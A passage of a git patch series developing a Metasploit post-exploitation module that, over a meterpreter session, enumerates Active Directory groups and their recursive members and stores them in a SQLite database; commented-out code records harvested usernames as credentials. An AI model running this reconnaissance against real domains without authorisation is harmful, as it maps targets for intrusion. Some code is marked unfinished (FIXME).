Msf::Post::Windows::LDAP + include Msf::Post::Windows::Accounts + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'AD Group & User Membership to Offline SQL Database', + 'Description' => %{ + This module will gather a list of AD groups, identify the users (taking into account recursion) + and optionally write this to a greppable file, a SQLite database or a mysql-compatible SQL file + for offline analysis. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stuart Morgan ' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def get_grouplist(query_filter,max_search) + q = query(query_filter, max_search, @user_fields) + end + + def run + + end +end + +# @user_fields = USER_FIELDS.dup +# +# if datastore['ADDITIONAL_FIELDS'] +# additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',') +# @user_fields.push(*additional_fields) +# end +# +# max_search = datastore['MAX_SEARCH'] +# +# begin +# q = query(query_filter, max_search, @user_fields) +# rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e +# # Can't bind or in a network w/ limited accounts +# print_error(e.message) +# return +# end +# +# if q.nil? || q[:results].empty? +# print_status('No results returned.') +# else +# results_table = parse_results(q[:results]) +# print_line results_table.to_s +# +# if datastore['STORE_LOOT'] +# stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv) +# print_status("Results saved to: #{stored_path}") +# end +# end +# end +# +# def account_disabled?(uac) +# (uac & UAC_DISABLED) > 0 +# end +# +# def account_locked?(lockout_time) +# lockout_time > 0 +# end +# +# # Takes the results of LDAP query, parses them into a table +# # and records and usernames as {Metasploit::Credential::Core}s in +# # the database. +# # +# # @param [Array>] the LDAP query results to parse +# # @return [Rex::Ui::Text::Table] the table containing all the result data +# def parse_results(results) +# domain = datastore['DOMAIN'] || get_domain +# domain_ip = client.net.resolve.resolve_host(domain)[:ip] +# # Results table holds raw string data +# results_table = Rex::Ui::Text::Table.new( +# 'Header' => "Domain Users", +# 'Indent' => 1, +# 'SortIndex' => -1, +# 'Columns' => @user_fields +# ) +# +# results.each do |result| +# row = [] +# +# result.each do |field| +# if field.nil? +# row << "" +# else +# row << field[:value] +# end +# end +# +# username = result[@user_fields.index('sAMAccountName')][:value] +# uac = result[@user_fields.index('userAccountControl')][:value] +# lockout_time = result[@user_fields.index('lockoutTime')][:value] +# store_username(username, uac, lockout_time, domain, domain_ip) +# +# results_table << row +# end +# results_table +# end +# +# # Builds the LDAP query 'filter' used to find our User Accounts based on +# # criteria set by user in the Datastore. +# # +# # @return [String] the LDAP query string +# def query_filter +# inner_filter = '(objectCategory=person)(objectClass=user)' +# inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] +# inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] +# inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] +# inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] +# case datastore['UAC'] +# when 'ANY' +# when 'NO_PASSWORD' +# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=32)' +# when 'CHANGE_PASSWORD' +# inner_filter << '(!sAMAccountType=805306370)(pwdlastset=0)' +# when 'NEVER_EXPIRES' +# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=65536)' +# when 'SMARTCARD_REQUIRED' +# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=262144)' +# when 'NEVER_LOGGEDON' +# inner_filter << '(|(lastlogon=0)(!lastlogon=*))' +# end +# "(&#{inner_filter})" +# end +# +# def store_username(username, uac, lockout_time, realm, domain_ip) +# service_data = { +# address: domain_ip, +# port: 445, +# service_name: 'smb', +# protocol: 'tcp', +# workspace_id: myworkspace_id +# } +# +# credential_data = { +# origin_type: :session, +# session_id: session_db_id, +# post_reference_name: refname, +# username: username, +# realm_value: realm, +# realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN +# } +# +# credential_data.merge!(service_data) +# +# # Create the Metasploit::Credential::Core object +# credential_core = create_credential(credential_data) +# +# if account_disabled?(uac.to_i) +# status = Metasploit::Model::Login::Status::DISABLED +# elsif account_locked?(lockout_time.to_i) +# status = Metasploit::Model::Login::Status::LOCKED_OUT +# else +# status = Metasploit::Model::Login::Status::UNTRIED +# end +# +# # Assemble the options hash for creating the Metasploit::Credential::Login object +# login_data = { +# core: credential_core, +# status: status +# } +# +# login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED) +# +# # Merge in the service data and create our Login +# login_data.merge!(service_data) +# create_credential_login(login_data) +# end +#end From c98519e0b9e75600f9beea1135a642c3610dab5e Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:35:51 +0000 Subject: [PATCH 070/686] Get groups using ADSI --- .../post/windows/gather/ad_groupusers_to_sql.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index d3daeca3e4..40f14a4fa5 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -29,14 +29,21 @@ class Metasploit3 < Msf::Post )) end - def get_grouplist(query_filter,max_search) - q = query(query_filter, max_search, @user_fields) - end - def run + max_search = 0 + + # Download the list of groups + begin + group_fields = ['objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated'] + groups = query(query_filter, max_search, @group_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + end + end -end +end # @user_fields = USER_FIELDS.dup # From f2b038f4b3d133a8e90df5d58cfb72f6eb3d8f8b Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:39:56 +0000 Subject: [PATCH 071/686] Begin loop to grab effective users of each group --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 40f14a4fa5..7bdd177c01 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post def run max_search = 0 - # Download the list of groups + # Download the list of groups from Active Directory begin group_fields = ['objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated'] groups = query(query_filter, max_search, @group_fields) @@ -41,6 +41,15 @@ class Metasploit3 < Msf::Post return end + # If no groups were downloaded, there's no point carrying on + if groups.nil? || groups[:results].empty? + print_error('No AD groups were discovered') + return + end + + groups[:results].each do |individual_group| + + end end end From 7c145c45e8f739801fae2c7155f5eebb7a874428 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:44:35 +0000 Subject: [PATCH 072/686] add LDAP_MATCHING_RULE_IN_CHAIN oid (from my adsi rework earlier) --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 7bdd177c01..4a891106c7 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory begin - group_fields = ['objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated'] + group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated'] groups = query(query_filter, max_search, @group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error(e.message) @@ -47,7 +47,15 @@ class Metasploit3 < Msf::Post return end + # Go through each of the groups groups[:results].each do |individual_group| + begin + users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']}))" + users_in_group = query(query_filter, max_search, @group_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + end end From 85c4e895269897934f9e5f5c8ef0d8bf330c9c5d Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:55:02 +0000 Subject: [PATCH 073/686] Process user levels --- .../windows/gather/ad_groupusers_to_sql.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 4a891106c7..df2af5655c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory begin - group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated'] + group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated','description'] groups = query(query_filter, max_search, @group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error(e.message) @@ -49,14 +49,14 @@ class Metasploit3 < Msf::Post # Go through each of the groups groups[:results].each do |individual_group| - begin - users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']}))" - users_in_group = query(query_filter, max_search, @group_fields) - rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error(e.message) - return - end - + begin + users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] + users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0].to_s}))" + users_in_group = query(query_filter, max_search, @group_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + end end end From 2bcea91b15af7f60f537f037d14dfb6a5a4fd903 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:57:30 +0000 Subject: [PATCH 074/686] Differentiate between user and group errors --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index df2af5655c..ce3d8f87b4 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated','description'] groups = query(query_filter, max_search, @group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error(e.message) + print_error("Group: #{e.message}") return end @@ -52,9 +52,9 @@ class Metasploit3 < Msf::Post begin users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0].to_s}))" - users_in_group = query(query_filter, max_search, @group_fields) + users_in_group = query(users_filter, max_search, @users_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error(e.message) + print_error("Users: #{e.message}") return end end From 09fb37db6be8b59198a855bb44b51e04e0d339d6 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 23:07:02 +0000 Subject: [PATCH 075/686] Add status updates (useful if there are a large number of groups) --- .../post/windows/gather/ad_groupusers_to_sql.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index ce3d8f87b4..2cf3093445 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -33,11 +33,12 @@ class Metasploit3 < Msf::Post max_search = 0 # Download the list of groups from Active Directory + vprint_status "Retrieving AD Groups" begin group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated','description'] groups = query(query_filter, max_search, @group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Group: #{e.message}") + print_error("Error(Group): #{e.message.to_s}") return end @@ -47,14 +48,19 @@ class Metasploit3 < Msf::Post return end - # Go through each of the groups + # Go through each of the groups and identify the individual users in each group + vprint_status "Retrieving AD Group Membership" + users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] groups[:results].each do |individual_group| begin - users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] + # Perform the ADSI query to retrieve the effective users in each group + vprint_status "Retrieving members of #{individual_group[3].to_s}" users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0].to_s}))" users_in_group = query(users_filter, max_search, @users_fields) + next if users_in_group.nil? || users_in_group[:results].empty? + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Users: #{e.message}") + print_error("Error(Users): #{e.message.to_s}") return end end From 41c2d12e0cce3741ab6158b7a479cc29dd24c130 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 23:41:18 +0000 Subject: [PATCH 076/686] Tidy up initial print --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 2cf3093445..ae64cc8e79 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -5,6 +5,7 @@ require 'rex' require 'msf/core' +require 'sqlite3' class Metasploit3 < Msf::Post include Msf::Auxiliary::Report @@ -53,12 +54,16 @@ class Metasploit3 < Msf::Post users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] groups[:results].each do |individual_group| begin - # Perform the ADSI query to retrieve the effective users in each group + # Perform the ADSI query to retrieve the effective users in each group (recursion) vprint_status "Retrieving members of #{individual_group[3].to_s}" users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0].to_s}))" users_in_group = query(users_filter, max_search, @users_fields) next if users_in_group.nil? || users_in_group[:results].empty? - + + # Go through each of the users in the group + users_in_group[:results].each do |group_user| + print_line "Group [#{individual_group[3].to_s}] has member [#{group_user[3].to_s}]" + end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message.to_s}") return From 460778738d73b33670adbdb25e59a73ab191fea4 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 00:00:21 +0000 Subject: [PATCH 077/686] Initial version works --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index ae64cc8e79..1140cb399a 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -31,13 +31,14 @@ class Metasploit3 < Msf::Post end def run - max_search = 0 + max_search = datastore['MAX_SEARCH'] # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin + group_filter = '(objectClass=group)' group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated','description'] - groups = query(query_filter, max_search, @group_fields) + groups = query(group_filter, max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Group): #{e.message.to_s}") return @@ -55,14 +56,14 @@ class Metasploit3 < Msf::Post groups[:results].each do |individual_group| begin # Perform the ADSI query to retrieve the effective users in each group (recursion) - vprint_status "Retrieving members of #{individual_group[3].to_s}" - users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0].to_s}))" - users_in_group = query(users_filter, max_search, @users_fields) + vprint_status "Retrieving members of #{individual_group[3][:value].to_s}" + users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value].to_s}))" + users_in_group = query(users_filter, max_search, users_fields) next if users_in_group.nil? || users_in_group[:results].empty? # Go through each of the users in the group users_in_group[:results].each do |group_user| - print_line "Group [#{individual_group[3].to_s}] has member [#{group_user[3].to_s}]" + print_line "Group [#{individual_group[3][:value].to_s}] has member [#{group_user[3][:value].to_s}]" end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message.to_s}") From e3483a2ac35e4cd3403d021b692e1998d0b7159b Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 00:20:16 +0000 Subject: [PATCH 078/686] Getting RIDs from hex mess to decimal. Needs fixing --- .../windows/gather/ad_groupusers_to_sql.rb | 24 ++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 1140cb399a..6f59969cfa 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -60,10 +60,12 @@ class Metasploit3 < Msf::Post users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value].to_s}))" users_in_group = query(users_filter, max_search, users_fields) next if users_in_group.nil? || users_in_group[:results].empty? + group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) # Go through each of the users in the group users_in_group[:results].each do |group_user| - print_line "Group [#{individual_group[3][:value].to_s}] has member [#{group_user[3][:value].to_s}]" + user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) + print_line "Group [#{individual_group[3][:value].to_s}][#{group_rid.to_s}] has member [#{group_user[3][:value].to_s}][#{user_rid.to_s}]" end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message.to_s}") @@ -72,6 +74,26 @@ class Metasploit3 < Msf::Post end end + + # Convert the SID raw data to a string. TODO fix this mess.... + def sid_hex_to_string(data) + sid = [] + sid << data[0].to_s + rid = '' + (6).downto(1) do |i| + rid += byte2hex(data[i, 1][0]) + end + sid << rid.to_i.to_s + sid += data.unpack("bbbbbbbbV*")[8..-1] + final_sid = "S-" + sid.join('-') + return final_sid, sid[-1] + end + + def byte2hex(b) + ret = '%x' % (b.to_i & 0xff) + ret = '0' + ret if ret.length < 2 + ret + end end # @user_fields = USER_FIELDS.dup From f31c1c24dbaa9225ba0c6dd1ccb7b7196d807843 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:01:20 +0000 Subject: [PATCH 079/686] Added schema and code to populate SQLite db --- .../windows/gather/ad_groupusers_to_sql.rb | 73 ++++++++++++++++++- 1 file changed, 71 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 6f59969cfa..622a845de0 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -30,9 +30,13 @@ class Metasploit3 < Msf::Post )) end + # Entry point def run max_search = datastore['MAX_SEARCH'] + db, dbfile = create_sqlite_db + print_status "Database created: #{dbfile.to_s}" + # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin @@ -52,9 +56,10 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','title','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] + users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] groups[:results].each do |individual_group| begin + # Perform the ADSI query to retrieve the effective users in each group (recursion) vprint_status "Retrieving members of #{individual_group[3][:value].to_s}" users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value].to_s}))" @@ -62,10 +67,33 @@ class Metasploit3 < Msf::Post next if users_in_group.nil? || users_in_group[:results].empty? group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) + # Add the group to the database + sql_param_group = { :rid => group_rid.to_i, + :distinguishedName => individual_group[0][:value], + :sAMAccountName => individual_group[3][:value], + :description => individual_group[4][:value] + } + db.execute("insert into ad_groups (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_group) + # Go through each of the users in the group users_in_group[:results].each do |group_user| user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) print_line "Group [#{individual_group[3][:value].to_s}][#{group_rid.to_s}] has member [#{group_user[3][:value].to_s}][#{user_rid.to_s}]" + + # Add the group to the database + sql_param_user = { :rid => user_rid.to_i, + :distinguishedName => individual_group[0][:value], + :sAMAccountName => individual_group[3][:value], + :description => individual_group[4][:value] + } + db.execute("replace into ad_users (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_user) + + # Now associate the user with the group + sql_param_mapping = { :user_rid => user_rid.to_i, + :group_rid => group_rid.to_i + } + db.execute("insert into ad_mapping (user_rid,group_rid) VALUES (:user_rid,:group_rid)", sql_param_mapping) + end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message.to_s}") @@ -75,7 +103,49 @@ class Metasploit3 < Msf::Post end + # Creat the SQLite Database + def create_sqlite_db + begin + filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" + db = SQLite3::Database.new(filename) + + # Create the table for the AD Groups + sql_table_group = 'CREATE TABLE ad_groups ('\ + 'rid INTEGER PRIMARY KEY NOT NULL,'\ + 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'sAMAccountName TEXT,'\ + 'description TEXT'\ + 'whenChanged TEXT,'\ + 'whenCreated TEXT)' + db.execute(sql_table_group) + + # Create the table for the AD Users + sql_table_users = 'CREATE TABLE ad_users ('\ + 'rid INTEGER PRIMARY KEY NOT NULL,'\ + 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'description TEXT,'\ + 'logonCount INTEGER,'\ + 'userPrincipalName TEXT,'\ + 'whenCreated TEXT,'\ + 'whenChanged TEXT)' + db.execute(sql_table_users) + + # Create the table for the mapping between the two (membership) + sql_table_mapping = 'CREATE TABLE ad_mapping ('\ + 'user_rid INTEGER NOT NULL,' \ + 'group_rid INTEGER NOT NULL,'\ + 'PRIMARY KEY (user_rid, group_rid))' + db.execute(sql_table_mapping) + + return db, filename + rescue SQLite3::Exception => e + print_error("Error(Database): #{e.message.to_s}") + return + end + end + # Convert the SID raw data to a string. TODO fix this mess.... + # THIS NEEDS FIXING FIXME FIXME def sid_hex_to_string(data) sid = [] sid << data[0].to_s @@ -88,7 +158,6 @@ class Metasploit3 < Msf::Post final_sid = "S-" + sid.join('-') return final_sid, sid[-1] end - def byte2hex(b) ret = '%x' % (b.to_i & 0xff) ret = '0' + ret if ret.length < 2 From 15dc542544d6435490e4cd41f684e72144a469bd Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:13:44 +0000 Subject: [PATCH 080/686] Initial module works --- .../windows/gather/ad_groupusers_to_sql.rb | 157 +----------------- 1 file changed, 7 insertions(+), 150 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 622a845de0..9acbba37ed 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -57,6 +57,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] + group_counter = 0 groups[:results].each do |individual_group| begin @@ -82,9 +83,9 @@ class Metasploit3 < Msf::Post # Add the group to the database sql_param_user = { :rid => user_rid.to_i, - :distinguishedName => individual_group[0][:value], - :sAMAccountName => individual_group[3][:value], - :description => individual_group[4][:value] + :distinguishedName => group_user[0][:value], + :sAMAccountName => group_user[3][:value], + :description => group_user[5][:value] } db.execute("replace into ad_users (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_user) @@ -94,6 +95,7 @@ class Metasploit3 < Msf::Post } db.execute("insert into ad_mapping (user_rid,group_rid) VALUES (:user_rid,:group_rid)", sql_param_mapping) + group_counter += 1 end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Users): #{e.message.to_s}") @@ -101,6 +103,7 @@ class Metasploit3 < Msf::Post end end + print_status "Enumerated #{group_counter} group(s)" end # Creat the SQLite Database @@ -124,6 +127,7 @@ class Metasploit3 < Msf::Post 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'description TEXT,'\ + 'sAMAccountName TEXT,'\ 'logonCount INTEGER,'\ 'userPrincipalName TEXT,'\ 'whenCreated TEXT,'\ @@ -164,150 +168,3 @@ class Metasploit3 < Msf::Post ret end end - -# @user_fields = USER_FIELDS.dup -# -# if datastore['ADDITIONAL_FIELDS'] -# additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',') -# @user_fields.push(*additional_fields) -# end -# -# max_search = datastore['MAX_SEARCH'] -# -# begin -# q = query(query_filter, max_search, @user_fields) -# rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e -# # Can't bind or in a network w/ limited accounts -# print_error(e.message) -# return -# end -# -# if q.nil? || q[:results].empty? -# print_status('No results returned.') -# else -# results_table = parse_results(q[:results]) -# print_line results_table.to_s -# -# if datastore['STORE_LOOT'] -# stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv) -# print_status("Results saved to: #{stored_path}") -# end -# end -# end -# -# def account_disabled?(uac) -# (uac & UAC_DISABLED) > 0 -# end -# -# def account_locked?(lockout_time) -# lockout_time > 0 -# end -# -# # Takes the results of LDAP query, parses them into a table -# # and records and usernames as {Metasploit::Credential::Core}s in -# # the database. -# # -# # @param [Array>] the LDAP query results to parse -# # @return [Rex::Ui::Text::Table] the table containing all the result data -# def parse_results(results) -# domain = datastore['DOMAIN'] || get_domain -# domain_ip = client.net.resolve.resolve_host(domain)[:ip] -# # Results table holds raw string data -# results_table = Rex::Ui::Text::Table.new( -# 'Header' => "Domain Users", -# 'Indent' => 1, -# 'SortIndex' => -1, -# 'Columns' => @user_fields -# ) -# -# results.each do |result| -# row = [] -# -# result.each do |field| -# if field.nil? -# row << "" -# else -# row << field[:value] -# end -# end -# -# username = result[@user_fields.index('sAMAccountName')][:value] -# uac = result[@user_fields.index('userAccountControl')][:value] -# lockout_time = result[@user_fields.index('lockoutTime')][:value] -# store_username(username, uac, lockout_time, domain, domain_ip) -# -# results_table << row -# end -# results_table -# end -# -# # Builds the LDAP query 'filter' used to find our User Accounts based on -# # criteria set by user in the Datastore. -# # -# # @return [String] the LDAP query string -# def query_filter -# inner_filter = '(objectCategory=person)(objectClass=user)' -# inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] -# inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] -# inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] -# inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] -# case datastore['UAC'] -# when 'ANY' -# when 'NO_PASSWORD' -# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=32)' -# when 'CHANGE_PASSWORD' -# inner_filter << '(!sAMAccountType=805306370)(pwdlastset=0)' -# when 'NEVER_EXPIRES' -# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=65536)' -# when 'SMARTCARD_REQUIRED' -# inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=262144)' -# when 'NEVER_LOGGEDON' -# inner_filter << '(|(lastlogon=0)(!lastlogon=*))' -# end -# "(&#{inner_filter})" -# end -# -# def store_username(username, uac, lockout_time, realm, domain_ip) -# service_data = { -# address: domain_ip, -# port: 445, -# service_name: 'smb', -# protocol: 'tcp', -# workspace_id: myworkspace_id -# } -# -# credential_data = { -# origin_type: :session, -# session_id: session_db_id, -# post_reference_name: refname, -# username: username, -# realm_value: realm, -# realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN -# } -# -# credential_data.merge!(service_data) -# -# # Create the Metasploit::Credential::Core object -# credential_core = create_credential(credential_data) -# -# if 